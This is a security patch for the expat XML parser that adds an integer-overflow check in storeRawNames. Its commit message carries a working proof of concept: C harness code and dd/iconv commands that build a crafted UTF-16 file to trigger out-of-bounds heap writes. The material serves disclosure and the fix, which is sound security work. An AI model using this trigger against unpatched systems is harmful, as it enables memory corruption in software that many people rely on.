expat: import patches for CVEs
Patch-Source: https://github.com/libexpat/libexpat/commit/89214940efd13e3b83fa078fd70eb4dbdc04c4a5
From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
From: Samanta Navarro <ferivoz@riseup.net>
Date: Tue, 15 Feb 2022 11:55:46 +0000
Subject: [PATCH] Prevent integer overflow in storeRawNames

An integer overflow in storeRawNames can be used for out-of-bounds heap
writes. The default configuration is affected. If expat is compiled
with XML_UNICODE, the attack does not work. Compiling with
-fsanitize=address confirms the following proof of concept.

The problem can be exploited by abusing the m_buffer expansion logic.
Even though the initial size of m_buffer is a power of two, it can
eventually end up slightly lower, which allows allocations very close
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
names of almost INT_MAX bytes can be parsed.

Unfortunately (from an attacker's point of view), INT_MAX/2 is also a
limit in string pools. A tag name of INT_MAX/2 characters or more is
not possible.

Expat can convert between different encodings. UTF-16 documents that
contain only ASCII-representable characters are twice as large as their
ASCII-encoded counterparts.

The proof of concept takes these three considerations into account:

1. Move the m_buffer size slightly below a power of two by using a
   short root node <a>. This allows m_buffer to grow very close to
   INT_MAX.
2. String pooling forbids tag names of INT_MAX/2 or more characters,
   so keep the attack tag name shorter than that.
3. To still overflow INT_MAX even though the name is limited to
   INT_MAX/2-1 (nul byte), use UTF-16 encoding and a tag that
   contains only ASCII characters. UTF-16 stores two bytes for each
   of these characters, while the converted tag name uses only one.
   The attack node byte count must be a bit higher than 2/3 INT_MAX
   so that the converted tag name is around INT_MAX/3; the sum of
   both can then overflow INT_MAX.

Thanks to the small root node, m_buffer can handle 2/3 INT_MAX bytes
without running into the INT_MAX boundary check. The string pool can
store INT_MAX/3 as the tag name because that amount is below the
INT_MAX/2 limit. The sum of both then overflows in storeRawNames.

Proof of Concept:

1. Compile expat with -fsanitize=address.

2. Create a proof-of-concept binary that reads the input file in
   16 MiB chunks, for better performance and easier integer
   calculations:

```
cat > poc.c << 'EOF'
#include <err.h>
#include <expat.h>
#include <stdlib.h>
#include <stdio.h>

#define CHUNK (16 * 1024 * 1024)
int main(int argc, char *argv[]) {
  XML_Parser parser;
  FILE *fp;
  char *buf;
  int i;

  if (argc != 2)
    errx(1, "usage: poc file.xml");
  if ((parser = XML_ParserCreate(NULL)) == NULL)
    errx(1, "failed to create expat parser");
  if ((fp = fopen(argv[1], "r")) == NULL) {
    XML_ParserFree(parser);
    err(1, "failed to open file");
  }
  if ((buf = malloc(CHUNK)) == NULL) {
    fclose(fp);
    XML_ParserFree(parser);
    err(1, "failed to allocate buffer");
  }
  i = 0;
  /* Feed the file to the parser one full chunk at a time; a trailing
     partial chunk would be skipped. */
  while (fread(buf, CHUNK, 1, fp) == 1) {
    printf("iteration %d: XML_Parse returns %d\n", ++i,
           XML_Parse(parser, buf, CHUNK, XML_FALSE));
  }
  free(buf);
  fclose(fp);
  XML_ParserFree(parser);
  return 0;
}
EOF
gcc -fsanitize=address -o poc poc.c -lexpat
```

3. Construct a specially prepared UTF-16 XML file:

```
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
```

4. Run the proof of concept:

```
./poc poc-utf16.xml
```
---
 expat/lib/xmlparse.c | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -2424,6 +2424,7 @@ storeRawNames(XML_Parser parser) {
   while (tag) {
     int bufSize;
     int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
+    size_t rawNameLen;
     char *rawNameBuf = tag->buf + nameLen;
     /* Stop if already stored. Since m_tagStack is a stack, we can stop
        at the first entry that has already been copied; everything
@@ -2435,7 +2436,11 @@ storeRawNames(XML_Parser parser) {
     /* For re-use purposes we need to ensure that the
        size of tag->buf is a multiple of sizeof(XML_Char).
     */
-    bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
+    rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
+    /* Detect and prevent integer overflow. */
+    if (rawNameLen > (size_t)INT_MAX - nameLen)
+      return XML_FALSE;
+    bufSize = nameLen + (int)rawNameLen;
     if (bufSize > tag->bufEnd - tag->buf) {
       char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
       if (temp == NULL)